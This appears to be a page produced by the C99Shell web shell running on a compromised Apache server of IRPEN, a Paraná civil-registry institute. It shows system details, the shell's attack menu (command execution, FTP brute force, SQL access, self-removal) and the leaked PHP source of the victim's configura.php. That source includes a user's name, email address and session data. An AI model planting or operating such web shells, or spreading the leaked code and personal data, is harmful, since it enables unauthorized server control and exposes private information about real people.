!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/certidoes/   drwxr-xr-x
Free 9.43 GB of 93.48 GB (10.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     configura.php (7.62 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
#############################################################################
    # Nome: noticia_cad.php                                                     #
    # System: Irpen                                                             #
    # Criado por: Rodrigo J Polette                                             #
    # Empresa: Netnigro                                                         #
    # E-mail: rodrigo@netnigro.com.br                                           #
    # Descrição: Formulário de Amostragem dos dados CNJ                         #
    # Histórico:                                                                #
    #    . 24/02/2010 - Rodrigo Justus Polette                                  #
    #            Criação da Página                                              #
    #############################################################################
    
    // Includes
    
include("../../config/config.php");
    include(
INCLUDES "conexaoBD.php");
    include(
INCLUDES "sentencas_sql.php");
    include(
INCLUDES "funcoes_uteis.php");
    include(
INCLUDES "valida_usuario.inc.php");
    
    
//SESSION = Array ( [cod_oficio] => 181106 [nome_oficio] => REGISTRO CIVIL E TABELIONATO DE NOTAS [cod_usuario] => 1138 [nome_usuario] => CLARINDO ESTEVAO A. MORGADO [email_usuario] => morgado_@brturbo.com.br [cod_perfil] => 2 [associado] => S )
    
    
$cod_oficio intval($_SESSION['cod_oficio']);
    
$sql "SELECT * FROM oficios_dados_cnj WHERE ODC_Oficio_DR = $cod_oficio LIMIT 1";
    
$rs_dados_cnj $conexao->query($sql);
    
$dados_cnj $rs_dados_cnj->fetch_assoc();
    
    
//dados_cnj = Array ( [ODC_Oficio_DR] => 18215 [ODC_CodigoCNJ] => 85936 [ODC_CodigoAcervo] => 1 [ODC_TipoServicoPrestado] => 55 [ODC_TipoLivroNascimento] => 1 [ODC_TipoLivroNatimorto] => 5 [ODC_TipoLivroObito] => 4 [ODC_TipoLivroCasamentoCivil] => 3 [ODC_TipoLivroCasamentoReligioso] => 2 ) 
    
    
$sqlMostraLogo "
        SELECT OFI_MostraLogoSN
        FROM oficios
        WHERE OFI_RowID = '
$cod_oficio'
    "
;
    
$rsMostraLogo $conexao->query($sqlMostraLogo);
    
$MostraLogo $rsMostraLogo->fetch_assoc();
    
$mostra $MostraLogo["OFI_MostraLogoSN"];

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta name="Description" content="IRPEN">
    <meta name="Keywords" content="">
    <meta name="resource-type" content="document">
    <meta name="classification" content="Internet">
    <meta name="robots" content="all">
    <meta name="rating" content="General">
    <meta name="Author" content="Ninart! Solucoes para Web.">
    <meta name="language" content="pt-br">
    <link rel="shortcut icon" href="imagens/favicon.gif"type="image/gif">   
    <link rel="stylesheet" href="<?=  HOST;?>css/irpen.css" type="text/css" />
    <link rel="stylesheet" media="all" type="text/css" href="<?=  HOST;?>css/menu_dropline.css" />
    <!--[if IE]>
    <link rel="stylesheet" media="all" type="text/css" href="css/menu_dropline_ie.css" />
    <![endif]-->
    <!--[if lt IE 7]>
        <link rel="stylesheet" media="all" type="text/css" href="css/menu_dropline_ie6.css" />
    <![endif]-->  
    <title>IRPEN | Instituto de Registro Civil de Pessoas Naturais do Paran&aacute; - 2010</title>
    <script type="text/javascript" src="<?=  HOST;?>includes/jquery-1.2.6.js"></script>
    <script type="text/javascript" src="<?=  HOST;?>includes/util.js"></script>
<style type="text/css">
<!--
.style1 {
    color: #666666;
    font-weight: bold;
}
-->
</style>
</head>
<body>
    <div id="wrap">
    
        <?php include "../topo_gestao.php";?>

        <!-- content-wrap starts -->
        <div id="content-wrap">
            <table width="100%" border="0">
                <tr><!--
                    <td align="left" valign="top" width="20%">
                        <?php 
                            
//Menu do site
                            //include(DIR_ADMIN . "menu_gestao.php");
                            //include("../menu_gestao.php");
                        
?>
                    </td>
                    <td align="left" valign="top" bgcolor="#cccccc">&nbsp;
                    </td>-->
                    <td align="left" valign="top" bgcolor="#FFFFFF" width="1%">&nbsp;
                    </td>
                    <td align="left" valign="top">            
                        <table width="100%" border="0" >
                            <tr>
                                <td align="left" valign="top">
                                    <h2>CONFIGURA&Ccedil;&Atilde;O DOCUMENTO IRPEN</h2>
                                    <div id="linha_h2"></div>
                                    <form id="form1" method="post" action="altera.php">
                                    <table width="100%" border="0" cellpadding="2" cellspacing="2">
                                        <tr>
                                            <td colspan="2">Selecionar a op&ccedil;&atilde;o abaixo, somente se voc&ecirc; for realizar a impress&atilde;o de certid&atilde;o em documento entregue pelo IRPEN.</td>
                                        </tr>
                                        <tr>
                                            <td colspan="2"><?php //echo $cod_oficio ?>&nbsp;</td>
                                        </tr>
                                        <tr>
                                            <td width="39%" align="right"><strong>Apresenta&ccedil;&atilde;o da logo superior: </strong></td>
                                            <td width="61%" align="left"><input name="mostra" type="radio" id="mostra" value="S" <?=  ($mostra == 'S') ? 'checked="checked"' ""?> />
                                              Sim</td>
                                        </tr>
                                        <tr>
                                            <td align="right">&nbsp;</td>
                                            <td align="left"><input type="radio" name="mostra" id="mostra" value="N" <?=  ($mostra == 'N') ? 'checked="checked"' ""?> />
                                              N&atilde;o</td>
                                        </tr>
                                        <tr>
                                          <td colspan="2" align="center">&nbsp;</td>
                                        </tr>
                                        <tr>
                                            <td colspan="2" align="center"><input type="submit" name="alterar" id="alterar" value="Alterar" /> 
                                                                                            <input type="button" name="BtnVoltar" id="BtnVoltar" value="Voltar" onclick="javascript: location.href='../index.php';" /></td>
                                        </tr>
                                    </table>
                                    </form>
                                </td>
                            </tr>  
                        </table>
                        <br />
                    </td>  
                </tr>                
            </table>
        </div>
        <div align="center">
            <strong><br />
            Rua Mal. Deodoro, 51 - Galeria Ritz - 18º Andar | Fone: (41) 3232-9811 | CEP 80.020-905 - Curitiba - Paraná</strong>
            <!-- content-wrap ends-->
        </div>
        <!-- footer starts -->
        <div id="footer-wrap">
        </div>
        <div id="rodape">
        </div>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0036 ]--